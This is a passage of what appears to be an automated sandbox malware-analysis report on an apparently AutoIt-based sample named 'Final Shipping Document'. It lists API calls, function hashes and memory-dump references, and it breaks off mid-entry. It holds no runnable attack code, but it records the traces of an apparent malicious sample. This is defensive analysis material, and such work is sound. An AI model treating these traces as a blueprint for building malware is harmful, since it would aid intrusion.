                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 3368777196-0
                                                            • Opcode ID: 56914022ca1effb108d3960137d672cb669bde5b5eabf0464f29ea53480c6e04
                                                            • Instruction ID: f47aeb29e9666f01802f52663055f456494e8b19b7dbe97470ce58846415d653
                                                            • Opcode Fuzzy Hash: 56914022ca1effb108d3960137d672cb669bde5b5eabf0464f29ea53480c6e04
                                                            • Instruction Fuzzy Hash: 75415971900205EBEF14AF64DC85BAE77B9FF05310F1440A9E900AA297D7B1DEA5DBA0
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00BFF3AB,00000000,?,?,00000000,?,00BF682C,00000004,00000000,00000000), ref: 00C3824C
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00C38272
                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C382D1
                                                            • ShowWindow.USER32(00000000,00000004), ref: 00C382E5
                                                            • EnableWindow.USER32(00000000,00000001), ref: 00C3830B
                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C3832F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: 7d4b484fed8d06b5fa86b997dfa868e05670ab6a02be23357be72fc67dd27e36
                                                            • Instruction ID: d7510663e788f0d3c88ae2393322e976ebb54aaae22ee91d713718eacd5de308
                                                            • Opcode Fuzzy Hash: 7d4b484fed8d06b5fa86b997dfa868e05670ab6a02be23357be72fc67dd27e36
                                                            • Instruction Fuzzy Hash: C7419474611744AFDF11CF15CC99BE97BE0BB0A714F184169FA185B272CB32A949CB50
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00C04C95
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C04CB2
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C04CEA
                                                            • _wcslen.LIBCMT ref: 00C04D08
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C04D10
                                                            • _wcsstr.LIBVCRUNTIME ref: 00C04D1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                            • String ID:
                                                            • API String ID: 72514467-0
                                                            • Opcode ID: c134f81820deaea4549fb9ca85cf1307f3dfc3805e7d7d9bbf13e28fc4542dcb
                                                            • Instruction ID: a0631bfa4f559ae8fc48910af0254884d389c2f2401620b56c36be2908333c1d
                                                            • Opcode Fuzzy Hash: c134f81820deaea4549fb9ca85cf1307f3dfc3805e7d7d9bbf13e28fc4542dcb
                                                            • Instruction Fuzzy Hash: 2B21D4B2204201BBEB195B39EC4AF7F7BECDF45750F108069FA05DA191EAA1DD00D7A0
                                                            APIs
                                                              • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                            • _wcslen.LIBCMT ref: 00C1587B
                                                            • CoInitialize.OLE32(00000000), ref: 00C15995
                                                            • CoCreateInstance.OLE32(00C3FCF8,00000000,00000001,00C3FB68,?), ref: 00C159AE
                                                            • CoUninitialize.OLE32 ref: 00C159CC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 3172280962-24824748
                                                            • Opcode ID: 28f4de7b2379ad6078bea831b23b89c8a37288d12675701eb7c432c05fc2a40a
                                                            • Instruction ID: d2197e7853357974e569828a895655b87ebe712260747402a2ea5909762bc18c
                                                            • Opcode Fuzzy Hash: 28f4de7b2379ad6078bea831b23b89c8a37288d12675701eb7c432c05fc2a40a
                                                            • Instruction Fuzzy Hash: 35D16570608701DFC714DF14C490A6ABBE1EF8A710F14889DF8999B361DB31ED86DB92
                                                            APIs
                                                              • Part of subcall function 00C00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C00FCA
                                                              • Part of subcall function 00C00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C00FD6
                                                              • Part of subcall function 00C00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C00FE5
                                                              • Part of subcall function 00C00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C00FEC
                                                              • Part of subcall function 00C00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C01002
                                                            • GetLengthSid.ADVAPI32(?,00000000,00C01335), ref: 00C017AE
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C017BA
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C017C1
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C017DA
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00C01335), ref: 00C017EE
                                                            • HeapFree.KERNEL32(00000000), ref: 00C017F5
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 42954c2818b84f0616da564492a4a7aada5c3d5b88e9f4e6cbdafb41913a9ca5
                                                            • Instruction ID: a93a557f57de4dd6b0839eb7d7f8c66d7195852ab78f95919a01efac88b3f010
                                                            • Opcode Fuzzy Hash: 42954c2818b84f0616da564492a4a7aada5c3d5b88e9f4e6cbdafb41913a9ca5
                                                            • Instruction Fuzzy Hash: 7B119032510205FFDB149FA8CC89BAFBBF9EF45355F184018F891A7290D735AA44DB60
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C014FF
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00C01506
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C01515
                                                            • CloseHandle.KERNEL32(00000004), ref: 00C01520
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C0154F
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C01563
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: bba8041bffcd65c8bbcf43746f96a9c252542708374ef415d49568f506fd822b
                                                            • Instruction ID: 8bad31ddd1d92d91bb44650f1a39495cc2b77257e06c788cdf4280c19d8aa7c2
                                                            • Opcode Fuzzy Hash: bba8041bffcd65c8bbcf43746f96a9c252542708374ef415d49568f506fd822b
                                                            • Instruction Fuzzy Hash: 8C113A7250024DABDF118F98DD89FDE7BA9EF49744F088015FE15A20A0C375CE64DB60
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00BC3379,00BC2FE5), ref: 00BC3390
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BC339E
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC33B7
                                                            • SetLastError.KERNEL32(00000000,?,00BC3379,00BC2FE5), ref: 00BC3409
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: f94e7553d33553a8fcaa44e9a29fce31cb34f7ccc36acb5d88dcfd2a929c58fc
                                                            • Instruction ID: f37139f7362fff9c12dd1f342d77b845bd5848988b9e7ff862595998069232e0
                                                            • Opcode Fuzzy Hash: f94e7553d33553a8fcaa44e9a29fce31cb34f7ccc36acb5d88dcfd2a929c58fc
                                                            • Instruction Fuzzy Hash: 7B01243220C351BEAA2427B57CD5F6E2AD4EB45B793A082BEF410812F0EF554E015288
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00BD5686,00BE3CD6,?,00000000,?,00BD5B6A,?,?,?,?,?,00BCE6D1,?,00C68A48), ref: 00BD2D78
                                                            • _free.LIBCMT ref: 00BD2DAB
                                                            • _free.LIBCMT ref: 00BD2DD3
                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DE0
                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DEC
                                                            • _abort.LIBCMT ref: 00BD2DF2
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: d3fbe5aa5b55a0cce2cd82c00b68f2ac8d012efe355eb3061ee9b1943bc49684
                                                            • Instruction ID: 086772910e2ee64241cd9c17c2ec5280853442622d2269d95963f4c1869b6862
                                                            • Opcode Fuzzy Hash: d3fbe5aa5b55a0cce2cd82c00b68f2ac8d012efe355eb3061ee9b1943bc49684
                                                            • Instruction Fuzzy Hash: 4CF0CD3550468067C22227357C46F5FA5D7EFE27A1F2445B7F864923E2FF6488015271
                                                            APIs
                                                              • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB9693
                                                              • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                              • Part of subcall function 00BB9639: BeginPath.GDI32(?), ref: 00BB96B9
                                                              • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C38A4E
                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00C38A62
                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C38A70
                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00C38A80
                                                            • EndPath.GDI32(?), ref: 00C38A90
                                                            • StrokePath.GDI32(?), ref: 00C38AA0
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: ec1dca2212c91a7755f5bcd00fbd69f45d9511900370a60657bebd63e24bbf2c
                                                            • Instruction ID: 953d6ab4f93fa86e8809979c1f9f316ee5eec4618055c58f9910fda41a64e137
                                                            • Opcode Fuzzy Hash: ec1dca2212c91a7755f5bcd00fbd69f45d9511900370a60657bebd63e24bbf2c
                                                            • Instruction Fuzzy Hash: AF11C97601014DFFDB129F94DC88FAE7F6DEB08354F048052BA19AA1A1C7719E55DFA0
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00C05218
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C05229
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C05230
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C05238
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C0524F
                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C05261
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 7af4ca61c170ed5fb4d15625cf49087e31ac4284f4e17aef6bf05d9925b1b267
                                                            • Instruction ID: a14a596e33b08468d26639d701c90f97fcc69b057d10d8d9e2e15b45a9482105
                                                            • Opcode Fuzzy Hash: 7af4ca61c170ed5fb4d15625cf49087e31ac4284f4e17aef6bf05d9925b1b267
                                                            • Instruction Fuzzy Hash: CF014F75A01719BBEB109BA59C89B5EBFB8EF48751F044065FA04E7291D6709900CFA0
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA1BF4
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA1BFC
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA1C07
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA1C12
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA1C1A
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA1C22
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 1e9ce2bd9a7790f6b6dfde947b681316539b74e35ec8a72bfeb2668823d89610
                                                            • Instruction ID: 37a869a46f8b19288a6e39e61a6df53e70984358f0d6e0a265d208b73761cc0f
                                                            • Opcode Fuzzy Hash: 1e9ce2bd9a7790f6b6dfde947b681316539b74e35ec8a72bfeb2668823d89610
                                                            • Instruction Fuzzy Hash: 190144B0902B5ABDE3008F6A8C85B56FEA8FF19354F00411BA15C4BA42C7B5A864CBE5
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C0EB30
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C0EB46
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00C0EB55
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB64
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB6E
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB75
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: a50323e71dbe50948b936bff4ed548883b7de563834627df36d62bdec0c5aa89
                                                            • Instruction ID: 6b629becbc261f123aa8f9cefd4dcd18feeb5ea25f3134323eecd1bff76f88c2
                                                            • Opcode Fuzzy Hash: a50323e71dbe50948b936bff4ed548883b7de563834627df36d62bdec0c5aa89
                                                            • Instruction Fuzzy Hash: 69F03A72250158BBE7215B629C8EFEF3A7CEFCAB11F004158F611E1091D7A05A01DBB5
                                                            APIs
                                                            • GetClientRect.USER32(?), ref: 00BF7452
                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BF7469
                                                            • GetWindowDC.USER32(?), ref: 00BF7475
                                                            • GetPixel.GDI32(00000000,?,?), ref: 00BF7484
                                                            • ReleaseDC.USER32(?,00000000), ref: 00BF7496
                                                            • GetSysColor.USER32(00000005), ref: 00BF74B0
                                                            Similarity
                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                            • String ID:
                                                            • API String ID: 272304278-0
                                                            • Opcode ID: 5e32bee735f654ad09df211eb6335d77ce95cd48a572e0c21815edac7c389e5f
                                                            • Instruction ID: 4f6c9aa1bdf2eaab19c99ba33b6420cb25febf3572f637629be4b14b1d3c7ca0
                                                            • Opcode Fuzzy Hash: 5e32bee735f654ad09df211eb6335d77ce95cd48a572e0c21815edac7c389e5f
                                                            • Instruction Fuzzy Hash: FA014B31410619EFEB515F64DC49BBE7BB5FB04311F5501A4FA16A31A1CF311E51AB50
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C0187F
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00C0188B
                                                            • CloseHandle.KERNEL32(?), ref: 00C01894
                                                            • CloseHandle.KERNEL32(?), ref: 00C0189C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C018A5
                                                            • HeapFree.KERNEL32(00000000), ref: 00C018AC
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: 7a0476c533cd7de5e17986e327bd3b95fff389426f41493664f67c8e278e9927
                                                            • Instruction ID: 7c59a94b981d715b6b436e904d3bb4aba61807102083d38a0b2149049fad765a
                                                            • Instruction Fuzzy Hash: 01E0E536014101BBDB015FA1ED8CB4EBF39FF4AB22B108220F225A1070CB329430EF50
                                                            APIs
                                                              • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C0C6EE
                                                            • _wcslen.LIBCMT ref: 00C0C735
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C0C79C
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C0C7CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                            • String ID: 0
                                                            • API String ID: 1227352736-4108050209
                                                            • Opcode ID: b9f50c3c101f0251b3b708dcf8e41a9858ad0b9378e5d6622a662f1d5eee04fd
                                                            • Instruction ID: f097164b10e2465d60b7b031202dab1e7e5aacf1d0baaa44f830d6ddfe227ee4
                                                            • Instruction Fuzzy Hash: 46519D716183019BD7259F2CC8C5B6E77E8AB89310F040B29F9A5E21E0DBB4DA44DB52
                                                            APIs
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00C2AEA3
                                                              • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                            • GetProcessId.KERNEL32(00000000), ref: 00C2AF38
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2AF67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                            • String ID: <$@
                                                            • API String ID: 146682121-1426351568
                                                            • Opcode ID: d0855c595828f6e5b9960082dd3d0902dd9b79ca3ab18e01d97f7186cb058095
                                                            • Instruction ID: 4086162e5bf82a8461742fb08f8f28c3fbe2088d1d29fd31bd7d58eddcfcf7e5
                                                            • Instruction Fuzzy Hash: 2C71AE71A04625DFCB14EF94D494A9EBBF0FF09310F048499E826AB762CB74EE45CB91
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C07206
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C0723C
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C0724D
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C072CF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 753597075-1075368562
                                                            • Opcode ID: a7d255914085328a2418eddea6c0310545fa79e5be122808232f56a83a747e41
                                                            • Instruction ID: f0c755907e4e39e46cde0a21008a9c601967225d72c2a026262a477fcfb4607b
                                                            • Instruction Fuzzy Hash: 32418EB1A04204EFDF19CF54C984B9A7BA9EF44310F1581A9BD059F28AD7B0EE40DBA0
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C01E66
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C01E79
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C01EA9
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2081771294-1403004172
                                                            • Opcode ID: 330fc16bf07774650b766596895c6d91a423d634d8c38ccb425e2a0b796259ee
                                                            • Instruction ID: 7f9a267ddbbe023626cd65b20ce9213b00b4ced8c261485724506219b63f3020
                                                            • Instruction Fuzzy Hash: A021D671A00104ABDB149B64DC8ADFFB7B9DF46390B184169FC35A71E1DB744A05D620
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C32F8D
                                                            • LoadLibraryW.KERNEL32(?), ref: 00C32F94
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C32FA9
                                                            • DestroyWindow.USER32(?), ref: 00C32FB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                            • String ID: SysAnimate32
                                                            • API String ID: 3529120543-1011021900
                                                            • Opcode ID: 389bc1b42b49ac70c795032b17e80794cfacfdf76cf5d7fe0ecf970ae245fc68
                                                            • Instruction ID: 5582d86e00d19c700a595a23e761959cf1f5dbccf4dc4e314e90c0ffe2e9f19a
                                                            • Instruction Fuzzy Hash: A321AC72224225ABEF205FA4DC81FBB77B9EB5D364F100628FA60E2190D771DC919760
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002), ref: 00BC4D8D
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BC4DA0
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002,00000000), ref: 00BC4DC3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 2219bc8adec29cc25ff25690942328fa031ef0c2c16ce0ceb5f1a09e2febf9c2
                                                            • Instruction ID: b423a1b96d8f2b2ce2444d8c4d0b6a3e84d4c3ce742370259c408c06eb50dad5
                                                            • Instruction Fuzzy Hash: 69F04F35A50208BBDB11AF90DC89FAEBBF5EF44751F0001A8F906A2260CB705E40DF91
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E9C
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BA4EAE
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EC0
                                                            Memory Dump Source
